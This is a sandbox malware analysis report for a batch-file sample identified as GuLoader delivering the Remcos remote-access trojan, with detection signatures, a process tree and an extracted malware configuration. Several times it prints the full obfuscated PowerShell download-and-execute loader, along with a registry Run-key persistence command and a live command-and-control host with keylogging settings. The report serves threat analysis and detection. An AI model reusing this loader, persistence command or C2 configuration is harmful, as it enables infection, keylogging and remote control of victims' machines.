Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat

Overview

General Information

Sample name:rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat
Analysis ID:1539094
MD5:e6e618c4354c26c555872d5398a72086
SHA1:76cddb6019c5d76a96de461a85742d766feebca8
SHA256:e0d9ebe414aca4f6d28b0f1631a969f9190b6fb2cf5599b99ccfc6b7916ed8b3
Tags:batuser-Porcupine
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Scan Loop Network
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6936 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rEXSP5634HISP9005STMSDSDOKUME74247linierelet.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7128 cmdline: powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili ';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende) {Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant ');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc( nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri ] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9 Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf. afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94 (Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 2132 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili ';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende) {Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant ');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc( nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri ] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9 Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf. afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94 (Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4348 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 6200 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 6120 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["pelele.duckdns.org:51525:1"], "Assigned name": "MISS Chy", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TXCR8B", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000003.3171953625.0000000008920000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000004.00000002.1977930635.00000000082A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000009.00000003.3171891296.000000000891A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000009.00000002.4145943989.0000000008951000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000009.00000002.4145675736.000000000891A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 10 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_7128.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_2132.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc244:$b2: ::FromBase64String(
                • 0xb2d5:$s1: -join
                • 0x4a81:$s4: +=
                • 0x4b43:$s4: +=
                • 0x8d6a:$s4: +=
                • 0xae87:$s4: +=
                • 0xb171:$s4: +=
                • 0xb2b7:$s4: +=
                • 0x15154:$s4: +=
                • 0x151d4:$s4: +=
                • 0x1529a:$s4: +=
                • 0x1531a:$s4: +=
                • 0x154f0:$s4: +=
                • 0x15574:$s4: +=
                • 0xbaef:$e4: Get-WmiObject
                • 0xbcde:$e4: Get-Process
                • 0xbd36:$e4: Start-Process
                • 0x15db6:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6120, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Diversify
                Sigma detected: Direct Autorun Keys Modification
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6200, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)", ProcessId: 6120, ProcessName: reg.exe
                Sigma detected: Msiexec Initiated Connection
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.56.189, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4348, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 4348, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)", ProcessId: 6200, ProcessName: cmd.exe
                Sigma detected: Suspicious Scan Loop Network
                Source: Process startedAuthor: frack113: Data: Command: powershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP 